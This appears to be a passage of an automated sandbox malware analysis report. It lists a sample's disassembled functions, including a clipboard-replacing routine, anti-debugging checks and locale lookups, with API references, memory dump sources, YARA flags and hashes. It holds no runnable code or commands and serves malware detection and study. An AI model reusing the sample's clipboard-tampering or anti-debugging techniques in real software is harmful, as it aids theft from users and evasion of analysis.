                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001), ref: 024C1B46
                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 024C1B70
                                                                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 024C1B79
                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 024C1B80
                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 024C1BA4
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000002D2), ref: 024C1BAF
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                    • String ID: 4#E$i
                                                                                                                                                                                                                                                                    • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                                                                    • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                                                    • Instruction ID: 057a5989c295d24765feb738bdd01b02e28d24272a35bf8867de8e1746211f39
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36510438C007949AE7119FA8ED457AD7774FF2A306F14522ED809A2173FB709681CB69
                                                                                                                                                                                                                                                                    Function 024C2361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 024C239C
                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 024C23B1
                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 024C23B8
                                                                                                                                                                                                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 024C23CB
                                                                                                                                                                                                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024C23EA
                                                                                                                                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 024C240B
                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 024C2416
                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 024C241F
                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 024C2443
                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 024C24CE
                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 024C24E6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1529870607-0
                                                                                                                                                                                                                                                                    • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                    • Instruction ID: dc9abca1d7b682c903aabf14d796d7761c011211d69c65ca613a68487233c5da
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A71FF76900228AFDB62DF68DD85FAEB7BCEB09711F0041A9F509E6151DA70AF84CF10
                                                                                                                                                                                                                                                                    Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                    • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                    • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                                                                                                                                                                                    Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                    • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                                                    Function 024FB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024FBCF4,?,00000000), ref: 024FBA6E
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024FBCF4,?,00000000), ref: 024FBA97
                                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,024FBCF4,?,00000000), ref: 024FBAAC
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                    • Instruction ID: 288a1f027990ebf76b0392541bbb88d75f7ef192e0cdbe7723b3037dddc8a195
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C219532E00304AAE7749F54D901BA772A6EBCAE1CB56C066EA0AD7204F732DA81C350
                                                                                                                                                                                                                                                                    Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                    • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                                                                                                                                                                                    Function 024FBBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024FBCB5
                                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 024FBD10
                                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 024FBD1F
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,024F0A1C,00000040,?,024F0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024FBD67
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,024F0A9C,00000040), ref: 024FBD86
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                    • Instruction ID: 7f37e6073a518e84179c4c1334e59d9c16c6f8ab6b38ff6aa6a1b7232299f209
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE519371900249ABEB51DFA5CC44ABF77B9EF9E708F04042FEA00E7290EB7196458B61
                                                                                                                                                                                                                                                                    Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C$C
                                                                                                                                                                                                                                                                    • API String ID: 0-238425240
                                                                                                                                                                                                                                                                    • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                    • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                                                                                                                                                                                    Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2444527052-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                                                    • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                                                                                                                                                                                    Function 024FB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024F0A23,?,?,?,?,024F047A,?,00000004), ref: 024FB353
                                                                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 024FB3E3
                                                                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 024FB3F1
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024F0A23,00000000,024F0B43), ref: 024FB494
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2444527052-0
                                                                                                                                                                                                                                                                    • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                                    • Instruction ID: edf2f6bc83b0d9fa1964e375e66873d598e0bd08c7bf10ffc40a8989b1ab2f83
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25610971600206AAD764AF35DC45BBB73ADEF8E718F14402FEB09D7680EB74D5408BA0
                                                                                                                                                                                                                                                                    Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2834031935-0
                                                                                                                                                                                                                                                                    • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                                                    • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                                                                                                                                                                                    Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                    • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                    • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                                                    Function 024EA63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,024CDAD7), ref: 024EA732
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024CDAD7), ref: 024EA73C
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024CDAD7), ref: 024EA749
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                    • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                    • Instruction ID: 4649a0793cfd33ccb82e500e5141296872c2ac950f1a4b6450f9e6394cce389f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B31D4B490122C9BDB21DF64D98879DBBB8BF18711F5042EAE40CA7260EB309B858F45
                                                                                                                                                                                                                                                                    Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                    • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                                                    Function 024F00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
